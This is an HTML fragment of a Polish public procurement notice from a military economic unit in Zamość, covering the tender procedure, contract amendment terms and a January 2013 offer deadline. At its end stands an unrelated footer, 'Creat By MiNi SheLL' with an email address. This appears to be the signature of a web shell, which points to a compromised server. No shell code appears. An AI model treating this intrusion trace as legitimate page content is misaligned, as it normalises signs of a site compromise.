<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający dopuszcza wprowadzenie zmian do projektu umowy.
1)	zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto;
2)	zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie 
w pierwotnym zakresie nie leży w interesie Zamawiającego;
3)	zmniejszenie wynagrodzenia za wykonanie przedmiotu zamówienia 
w przypadku zmniejszenia zakresu przedmiotu zamówienia w przypadku określonym w pkt 2;
4)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a)	gdy wykonanie zamówienia w określonym pierwotnym terminie nie leży w interesie Zamawiającego;
b)	działania siły wyższej, uniemożliwiającej wykonanie umowy 
w określonym  pierwotnie terminie;
	
4.	Zmiany umowy przewidziane w punkcie 3 dopuszczalne są w następujących warunkach:
1)	stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie                    odpowiednio  do treści przepisów wprowadzających zmianę;
2)	zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego;
3)	w zakresie wynikającym ze zmian w planie finansowym Zamawiającego; 
4)	wynagrodzenie za wykonanie przedmiotu zamówienia zostanie zmniejszone proporcjonalnie do zmienionego zakresu zamówienia
5) zmiana terminu realizacji zamówienia:
a) o okres umożliwiajacy osiagniecie uzasadnionego interesu przez Zamawiajacego
b) o okres działania sily wyższej oraz potrzeby do usuniecia skutków jej dzialania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//:przetarg.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 32 Wojskowy Oddział Gospodarczy w Zamościu
22 - 400 Zamość, ul. Marszałka Józefa Piłsudskiego 36
bud 27, pokój 14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2013 godzina 13:00, miejsce: 32 Wojskowy Oddział Gospodarczy w Zamościu
22 - 400 Zamość, ul. Marszałka Józefa Piłsudskiego 36
budynek 33 pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com